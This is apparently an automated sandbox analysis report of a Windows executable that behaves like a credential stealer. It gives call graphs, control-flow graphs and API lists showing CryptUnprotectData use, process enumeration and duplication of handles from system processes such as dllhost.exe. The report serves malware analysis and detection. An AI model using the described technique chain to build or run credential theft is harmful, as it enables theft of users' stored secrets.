39209->39276 39211 409690 39211->39204 39212->38468 39213->38474 39222->39199 39277 40a6e6 WideCharToMultiByte 39223->39277 39225 409202 39278 444432 39225->39278 39228 40b273 27 API calls 39229 409236 39228->39229 39324 438552 39229->39324 39232 409383 39234 40b273 27 API calls 39232->39234 39235 409399 39234->39235 39238 438552 134 API calls 39235->39238 39256 4093a3 39238->39256 39242 4094ff 39353 443d90 39242->39353 39245 4251c4 137 API calls 39245->39256 39249 4093df 39352 424f26 123 API calls 39249->39352 39251 4253cf 17 API calls 39251->39256 39255 40951d 39255->39200 39256->39242 39256->39245 39256->39249 39256->39251 39259 4093e4 39256->39259 39350 4253af 17 API calls 39259->39350 39275->39208 39276->39211 39277->39225 39374 4438b5 39278->39374 39280 44444c 39281 409215 39280->39281 39388 415a6d 39280->39388 39281->39228 39281->39255 39283 4442e6 11 API calls 39285 44469e 39283->39285 39284 444486 39286 4444b9 memcpy 39284->39286 39323 4444a4 39284->39323 39285->39281 39288 443d90 111 API calls 39285->39288 39392 415258 39286->39392 39288->39281 39289 444524 39290 444541 39289->39290 39291 44452a 39289->39291 39395 444316 39290->39395 39292 416935 16 API calls 39291->39292 39292->39323 39295 444316 18 API calls 39296 444563 39295->39296 39297 444316 18 API calls 39296->39297 39298 44456f 39297->39298 39299 444316 18 API calls 39298->39299 39323->39283 39513 438460 39324->39513 39326 409240 39326->39232 39327 4251c4 39326->39327 39564 424f07 39327->39564 39329 4251e4 39330 4251f7 39329->39330 39331 4251e8 39329->39331 39572 4250f8 39330->39572 39352->39242 39375 4438d0 39374->39375 39385 4438c9 39374->39385 39462 415378 memcpy memcpy 39375->39462 39385->39280 39389 415a77 39388->39389 39390 415a8d 39389->39390 39391 415a7e memset 39389->39391 39390->39284 39391->39390 39393 4438b5 11 API calls 39392->39393 39394 41525d 39393->39394 39394->39289 39396 444328 39395->39396 39397 444423 39396->39397 39398 44434e 39396->39398 39463 4446ea 11 API calls 39397->39463 39400 432d4e 3 API calls 39398->39400 39401 44435a 39400->39401 39403 444375 39401->39403 39408 44438b 39401->39408 39402 432d4e 3 API calls 39404 4443ec 39402->39404 39405 416935 16 API calls 39403->39405 39406 444381 39404->39406 39407 416935 16 API calls 39404->39407 39405->39406 39406->39295 39407->39406 39408->39402 39463->39406 39525 41703f 39513->39525 39515 43847a 39516 43848a 39515->39516 39517 43847e 39515->39517 39532 438270 39516->39532 39562 4446ea 11 API calls 39517->39562 39521 438488 39521->39326 39523 4384bb 39524 438270 134 API calls 39523->39524 39524->39521 39526 417044 39525->39526 39527 41705c 39525->39527 39529 416760 11 API calls 39526->39529 39531 417055 39526->39531 39528 417075 39527->39528 39530 41707a 11 API calls 39527->39530 39528->39515 39529->39531 39530->39526 39531->39515 39533 415a91 memset 39532->39533 39534 43828d 39533->39534 39535 438297 39534->39535 39536 438341 39534->39536 39538 4382d6 39534->39538 39537 415c7d 16 API calls 39535->39537 39539 44358f 19 API calls 39536->39539 39540 438458 39537->39540 39541 4382fb 39538->39541 39542 4382db 39538->39542 39552 438318 39539->39552 39540->39521 39563 424f26 123 API calls 39540->39563 39544 415c23 memcpy 39541->39544 39543 416935 16 API calls 39542->39543 39545 4382e9 39543->39545 39546 438305 39544->39546 39547 415c7d 16 API calls 39545->39547 39549 44358f 19 API calls 39546->39549 39546->39552 39547->39535 39548 438373 39551 438383 39548->39551 39553 4300e8 memset memset memcpy 39548->39553 39549->39552 39550 43819e 115 API calls 39550->39548 39554 4383cd 39551->39554 39556 415c23 memcpy 39551->39556 39552->39548 39552->39550 39553->39551 39555 4383f5 39554->39555 39557 42453e 123 API calls 39554->39557 39556->39554 39557->39555 39562->39521 39563->39523 39565 424f1f 39564->39565 39566 424f0c 39564->39566 39585 424eea 11 API calls 39565->39585 39584 416760 11 API calls 39566->39584 39569 424f24 39569->39329 39570 424f18 39570->39329 39584->39570 39585->39569 39663 413f4f 39636->39663 39639 413f37 K32GetModuleFileNameExW 39640 413f4a 39639->39640 39640->38506 39642 413969 wcscpy 39641->39642 39643 41396c wcschr 39641->39643 39653 413a3a 39642->39653 39643->39642 39645 41398e 39643->39645 39668 4097f7 wcslen wcslen _memicmp 39645->39668 39647 41399a 39648 4139a4 memset 39647->39648 39649 4139e6 39647->39649 39669 409dd5 GetWindowsDirectoryW wcscpy 39648->39669 39651 413a31 wcscpy 39649->39651 39652 4139ec memset 39649->39652 39651->39653 39670 409dd5 GetWindowsDirectoryW wcscpy 39652->39670 39653->38506 39654 4139c9 wcscpy wcscat 39654->39653 39656 413a11 memcpy wcscat 39656->39653 39658 413cb0 GetModuleHandleW 39657->39658 39659 413cda 39657->39659 39658->39659 39662 413cbf GetProcAddress 39658->39662 39660 413ce3 GetProcessTimes 39659->39660 39661 413cf6 39659->39661 39660->38508 39661->38508 39662->39659 39664 413f2f 39663->39664 39665 413f54 39663->39665 39664->39639 39664->39640 39666 40a804 8 API calls 39665->39666 39667 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39666->39667 39667->39664 39668->39647 39669->39654 39670->39656 39671->38528 39672->38551 39674 409cf9 GetVersionExW 39673->39674 39675 409d0a 39673->39675 39674->39675 39675->38558 39675->38562 39676->38563 39677->38568 39678->38570 39679->38636 39681 40bba5 39680->39681 39725 40cc26 39681->39725 39684 40bd4b 39746 40cc0c 39684->39746 39689 40b2cc 27 API calls 39690 40bbef 39689->39690 39753 40ccf0 _wcsicmp 39690->39753 39692 40bbf5 39692->39684 39754 40ccb4 6 API calls 39692->39754 39694 40bc26 39695 40cf04 17 API calls 39694->39695 39696 40bc2e 39695->39696 39697 40bd43 39696->39697 39698 40b2cc 27 API calls 39696->39698 39699 40cc0c 4 API calls 39697->39699 39700 40bc40 39698->39700 39699->39684 39755 40ccf0 _wcsicmp 39700->39755 39702 40bc46 39702->39697 39703 40bc61 memset memset WideCharToMultiByte 39702->39703 39756 40103c strlen 39703->39756 39705 40bcc0 39706 40b273 27 API calls 39705->39706 39707 40bcd0 memcmp 39706->39707 39707->39697 39708 40bce2 39707->39708 39709 404423 38 API calls 39708->39709 39710 40bd10 39709->39710 39710->39697 39711 40bd3a LocalFree 39710->39711 39712 40bd1f memcpy 39710->39712 39711->39697 39712->39711 39713->38651 39714->38687 39715->38687 39716->38687 39717->38687 39718->38687 39719->38687 39720->38687 39721->38687 39722->38687 39723->38663 39724->38684 39757 4096c3 CreateFileW 39725->39757 39727 40cc34 39728 40cc3d GetFileSize 39727->39728 39736 40bbca 39727->39736 39729 40afcf 2 API calls 39728->39729 39730 40cc64 39729->39730 39758 40a2ef ReadFile 39730->39758 39732 40cc71 39759 40ab4a MultiByteToWideChar 39732->39759 39734 40cc95 CloseHandle 39735 40b04b ??3@YAXPAX 39734->39735 39735->39736 39736->39684 39737 40cf04 39736->39737 39738 40b633 free 39737->39738 39739 40cf14 39738->39739 39765 40b1ab free free 39739->39765 39741 40bbdd 39741->39684 39741->39689 39742 40cf1b 39742->39741 39743 40cfef 39742->39743 39766 40cd4b 39742->39766 39745 40cd4b 14 API calls 39743->39745 39745->39741 39747 40b633 free 39746->39747 39748 40cc15 39747->39748 39749 40aa04 free 39748->39749 39750 40cc1d 39749->39750 39812 40b1ab free free 39750->39812 39752 40b7d4 memset CreateFileW 39752->38642 39752->38643 39753->39692 39754->39694 39755->39702 39756->39705 39757->39727 39758->39732 39760 40ab6b 39759->39760 39764 40ab93 39759->39764 39761 40a9ce 4 API calls 39760->39761 39762 40ab74 39761->39762 39763 40ab7c MultiByteToWideChar 39762->39763 39763->39764 39764->39734 39765->39742 39767 40cd7b 39766->39767 39800 40aa29 6 API calls 39767->39800 39769 40cef5 39770 40aa04 free 39769->39770 39771 40cefd 39770->39771 39771->39742 39772 40cd89 39772->39769 39801 40aa29 6 API calls 39772->39801 39774 40ce1d 39802 40aa29 6 API calls 39774->39802 39776 40ce3e 39777 40ce6a 39776->39777 39803 40abb7 wcslen memmove 39776->39803 39778 40ce9f 39777->39778 39806 40abb7 wcslen memmove 39777->39806 39809 40a8d0 7 API calls 39778->39809 39782 40ce56 39804 40aa71 wcslen 39782->39804 39783 40ce8b 39807 40aa71 wcslen 39783->39807 39784 40ceb5 39810 40a8d0 7 API calls 39784->39810 39787 40ce5e 39805 40abb7 wcslen memmove 39787->39805 39790 40ce93 39808 40abb7 wcslen memmove 39790->39808 39791 40cecb 39811 40d00b malloc memcpy free free 39791->39811 39794 40cedd 39795 40aa04 free 39794->39795 39796 40cee5 39795->39796 39797 40aa04 free 39796->39797 39798 40ceed 39797->39798 39799 40aa04 free 39798->39799 39799->39769 39800->39772 39801->39774 39802->39776 39803->39782 39804->39787 39805->39777 39806->39783 39807->39790 39808->39778 39809->39784 39810->39791 39811->39794 39812->39752 39813->38703 39814->38711 40324 441819 40327 430737 40324->40327 40326 441825 40328 430756 40327->40328 40340 43076d 40327->40340 40329 430774 40328->40329 40330 43075f 40328->40330 40342 43034a memcpy 40329->40342 40341 4169a7 11 API calls 40330->40341 40333 4307ce 40335 430819 memset 40333->40335 40343 415b2c 11 API calls 40333->40343 40334 43077e 40334->40333 40338 4307fa 40334->40338 40334->40340 40335->40340 40337 4307e9 40337->40335 40337->40340 40344 4169a7 11 API calls 40338->40344 40340->40326 40341->40340 40342->40334 40343->40337 40344->40340 40345 41493c EnumResourceNamesW

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                              • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                              • API String ID: 708747863-3398334509
                                                                                                                                                              • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                              • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 free 643->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                              • API String ID: 1344430650-1740548384
                                                                                                                                                              • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                              • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                              • String ID: AE$BIN
                                                                                                                                                              • API String ID: 1668488027-3931574542
                                                                                                                                                              • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                              • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                              APIs
                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 767404330-0
                                                                                                                                                              • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                              • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                              APIs
                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$FirstNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1690352074-0
                                                                                                                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041898C
                                                                                                                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoSystemmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3558857096-0
                                                                                                                                                              • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                              • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 41 445823-445826 14->41 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 50 445879-44587c 18->50 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 32 445605-445607 22->32 33 445603 22->33 30 4459f2-4459fa 23->30 31 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->31 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 43 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 30->43 44 445b29-445b32 30->44 145 4459d0-4459e8 call 40b6ef 31->145 146 4459ed 31->146 32->21 37 445609-44560d 32->37 33->32 37->21 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 37->48 38->3 39->38 51 44584c-445854 call 40b1ab 41->51 52 445828 41->52 182 445b08-445b15 call 40ae51 43->182 53 445c7c-445c85 44->53 54 445b38-445b96 memset * 3 44->54 156 445665-445670 call 40b1ab 48->156 157 445643-445663 call 40a9b5 call 4087b3 48->157 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 